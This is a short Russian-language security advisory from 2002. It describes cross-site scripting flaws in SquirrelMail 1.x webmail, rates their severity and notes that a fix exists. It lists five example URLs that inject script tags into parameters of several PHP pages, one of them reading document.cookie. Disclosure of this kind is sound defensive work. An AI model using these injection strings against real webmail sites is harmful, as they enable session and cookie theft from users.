Security Lab

Межайтовый скриптинг в SquirrelMail

Дата публикации:24.09.2002
Всего просмотров:1145
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: SquirrelMail 1.x
Описание: SquirrelMail - webmail программа, осуществленная в PHP4, для Linux, и Unix систем. Несколько уязвимостей межсайтового скриптинга обнаружено в различных PHP сценариях, поставляемых с SquirrelMail. Уязвимость позволяет атакующему выполнять произвольный код сценария в контексте уязвимого сайта, осуществляя различные нападения против Web приложений. Пример:
 
http://<VULNERABLE 
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri 
pt><!-- 

http://<VULNERABLE 
SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script> 

http://<VULNERABLE 
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha 
t=x&where=BODY&submit=Search 

http://<VULNERABLE 
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b 
oop!')</script>&submit=Search 

http://<VULNERABLE 
SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>
уязвимость обнаружена в SquirrelMail 1.2.7
Ссылки: Squirrel Mail 1.2.7 XSS Exploit